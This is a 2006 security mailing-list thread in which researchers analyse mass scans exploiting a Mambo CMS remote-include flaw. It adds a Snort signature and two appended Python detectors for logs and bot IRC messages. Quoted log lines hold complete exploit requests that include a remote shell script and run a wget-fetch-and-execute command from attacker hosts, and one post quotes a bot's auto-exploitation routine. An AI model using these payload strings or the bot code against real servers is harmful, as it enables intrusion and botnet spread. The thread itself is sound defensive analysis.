Security Incidents mailing list archives

Re: High volume of Mambo scans (perlb0t)


From: Daniel Cid <danielcid () yahoo com br>
Date: Mon, 15 May 2006 10:54:47 -0300 (ART)

I was looking at the scripts they try to download and
it does not look like a common perl bot (connecting
to IRC). It's also written in PHP and by a Brazilian
person (comments in Portuguese) and with terrible
code :) I didn't have time to fully look at it,
though.


These are the pages they access:

http://usuarios.lycos.es/athos666/d25/
http://usuarios.lycos.es/athos666/d25/therules25.dat
http://radius01.comete.ci/tool.gif


I'm attaching them just in case they remove
these pages (please be aware that they are
scripts, not gifs :)).


Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net

--- Jamie Riden <jamesr () europe com> wrote:

Seems to have some kind of google search code for the particular
vulnerability - haven't seen this before:

if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
    srand;
    my $itime = time;
    my ($cur_time);
    my ($exploited);
    $boturl=$2;
    $cur_time = time - $itime;$exploited = 0;
    while($1>$cur_time){
        $cur_time = time - $itime;
        @urls=fetch();
        foreach $url (@urls) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Trying to exploit ".$url);
            $cur_time = time - $itime;
            my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
            $url=$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";
            $page = http_query($url);
            $exploited = $exploited + 1;
        }
    }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");

This is a quick stab at a snort sig:

alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 \
    (msg: "BLEEDING-EDGE perlb0t Bot Reporting Scan/Exploit"; \
    flow: to_server,established; \
    content:"PRIVMSG|20|"; nocase; within: 80; \
    tag: session, 20, packets; \
    pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; within:16; \
    pcre:"/(Exploiting|Exploited|Attacking|Scanning|perlb0t)/i"; \
    classtype: trojan-activity; sid: xxxx; rev:1; )

but I'm sure this could be improved.

cheers,
 Jamie

On 15/05/06, Jamie Riden <jamesr () europe com> wrote:
Looks like some sort of shellbot wanting to connect to an IRC channel
#abusers on abuser.hacked.in:8080.

I've been seeing occasional probes for Mambo's index.php on and off
for a while now - the first part is similar to
http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf
but the payloads are slightly different, though it always seems to end up with
an IRC bot of some kind.

I usually see them coupled with scans for coppermine and other remote
include issues, plus xmlrpc probes.

I think you're seeing an attempt to exploit issue#3 here -
http://secunia.com/advisories/18935/

cheers,
 Jamie

On 14/05/06, Daniel Cid <danielcid () yahoo com br> wrote:
Since Thursday night I'm seeing a high volume of scans
on different web servers for possibly the following
vulns:

http://secunia.com/advisories/14337/

http://www.osvdb.org/displayvuln.php?osvdb_id=10180


However, they say the problem is on function.php and
I'm seeing them on index.php. Can anyone confirm that?

Some log samples:

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"

--
Jamie Riden / jamesr () europe com /
jamie.riden () computer org
NZ Honeynet project - http://www.nz-honeynet.org/



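The log lines Daniel posted are the raw material for a web-side detector. The following is an added example, not code from either poster: it parses Apache combined-format lines, flags requests that push a remote URL into mosConfig_absolute_path (the GLOBALS-overwrite remote-include pattern seen above), and pulls out the included script URL, the decoded shell command and the hosts the command downloads the bot from. Three of the sample lines are copied from the post; the fourth (client 192.0.2.10, an ordinary com_content request) is constructed so the filter's negative case is exercised. The downloader regex, the field names in the returned record and the set of accepted URL schemes are my choices.

```python
import re
from urllib.parse import unquote, urlsplit

# Three of the access-log lines quoted in Daniel's post (copied from the page), plus one
# constructed benign request (192.0.2.10) to show the filter does not fire on ordinary
# Mambo traffic.
SAMPLE_LOG = """\
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
192.0.2.10 - - [12/May/2006:16:51:00 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [time], "request", status, size, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Downloader invocations inside the injected shell command; the URL ends at the next
# shell separator.
FETCH_RE = re.compile(r'\b(?:wget|curl|fetch|lwp-download)\s+(https?://[^\s;|&]+)', re.I)


def parse_query(target):
    """Split a request target into its path and a list of decoded (key, value) pairs.
    Split on '&' only: the injected cmd contains ';', which some query parsers also
    treat as a separator and would shred the command."""
    path, _, query = target.partition("?")
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((unquote(key), unquote(value)))
    return path, pairs


def analyse_line(line):
    """Return a record for a remote-include attempt via mosConfig_absolute_path, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, pairs = parse_query(m.group("target"))
    params = dict(pairs)
    include = params.get("mosConfig_absolute_path", "")
    if not include.lower().startswith(("http://", "https://", "ftp://")):
        return None  # a local path here is not the remote-include pattern
    include_url = include.rstrip("?")  # the trailing '?' turns the rest of the include path into a query string
    cmd = params.get("cmd", "").rstrip("?")
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "path": path,
        "globals_overwrite": "GLOBALS" in params,  # the GLOBALS= / _REQUEST[...] marker
        "include_url": include_url,
        "include_host": urlsplit(include_url).hostname,
        "cmd": cmd,
        "payload_urls": [u.rstrip("?") for u in FETCH_RE.findall(cmd)],
    }


def scan_log(text):
    return [hit for hit in (analyse_line(l) for l in text.splitlines()) if hit]


def iocs(hits):
    """Hosts serving the included script and the dropped bot: a block/alert list."""
    hosts = {h["include_host"] for h in hits}
    for h in hits:
        hosts.update(urlsplit(u).hostname for u in h["payload_urls"])
    return sorted(hosts)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} includes {h["include_url"]}, drops {h["payload_urls"]}, status {h["status"]}')
    print("IOC hosts:", iocs(hits))
```

The status code is recorded but not used as a filter on purpose: the 404s in Daniel's logs only say these hosts had no /index.php, and on a server that does run Mambo the same request would come back 200 whether or not the include succeeded. The interesting fields for response are the include host (the PHP shell) and the wget target (the bot), which is what iocs() collects.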



                

Attachment: therules25.dat
Description: 1269156576-therules25.dat
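Jamie's snort rule keys on the bot's own IRC status messages, and the quoted Perl shows exactly which messages the google routine emits. The following is an added example, not code from either poster or from the rule: it reproduces the rule's payload checks (the PRIVMSG content match and the two pcre alternations, with the `}` in the posted rule read as `|`) in Python and runs them over the three messages reconstructed from the bot's sendraw() calls. Port, flow and `within` offsets are not modelled, beyond requiring PRIVMSG within the first 80 bytes. The channel name #abusers is taken from Jamie's post; the target URL, the box count and the duration in the messages, and the benign chatter lines, are constructed.

```python
import re

# The three status messages the bot's "google" routine sends, reconstructed from the
# quoted Perl (sendraw(..., "PRIVMSG $printl :\002[GOOGLE]\002 ...")). The channel
# "#abusers" comes from Jamie's post; the URL, count and duration are constructed.
BOT_LINES = [
    "PRIVMSG #abusers :\x02[GOOGLE]\x02 Scanning for unpatched mambo for 60 seconds.",
    "PRIVMSG #abusers :\x02[GOOGLE]\x02 Trying to exploit http://www.example.com/index.php",
    "PRIVMSG #abusers :\x02[GOOGLE]\x02 Exploited 3 boxes in 60 seconds.",
]
# Constructed IRC chatter that shares some of the keywords.
BENIGN_LINES = [
    "PRIVMSG #help :has anyone tried the HTTP module with VERSION 2?",
    "NOTICE #abusers :scanning done",
    "PRIVMSG #security :new mambo exploit on the list, scan your servers",
]

# The rule's content and pcre matches, as bytes regexes (/i is the nocase).
PRIVMSG = re.compile(rb"PRIVMSG ", re.I)
KEYWORD = re.compile(rb"(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)", re.I)
# Jamie's action list, with the '}' in the posted rule read as '|'.
ACTION_ORIG = re.compile(rb"(Exploiting|Exploited|Attacking|Scanning|perlb0t)", re.I)
# Widened to the stems so "Trying to exploit <url>" is caught as well.
ACTION_WIDE = re.compile(rb"(Exploit|Attack|Scanning|perlb0t)", re.I)


def matches(line, action=ACTION_ORIG):
    """Apply the rule's three payload checks in order. Port and flow options are
    not modelled; 'within' is read only as 'PRIVMSG within the first 80 bytes'."""
    data = line.encode() if isinstance(line, str) else line
    m = PRIVMSG.search(data)
    if m is None or m.start() > 80:
        return False
    if KEYWORD.search(data, m.end()) is None:
        return False
    return action.search(data, m.end()) is not None


def evaluate(lines, action=ACTION_ORIG):
    return [matches(l, action) for l in lines]


if __name__ == "__main__":
    for label, lines in (("bot", BOT_LINES), ("benign", BENIGN_LINES)):
        print(label, "original:", evaluate(lines), "widened:", evaluate(lines, ACTION_WIDE))
```

Against the bot's own messages the posted action list fires on "Scanning for unpatched mambo" and "Exploited N boxes" but not on the per-target "Trying to exploit <url>" line, since neither "Exploiting" nor "Exploited" occurs in it; matching the stem "Exploit" closes that gap. The cost shows on the constructed "#security" line, which the widened list also flags, so the rule's restriction to non-HTTP ports and the tag: session option do the work of separating bot reporting from people talking about exploits.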

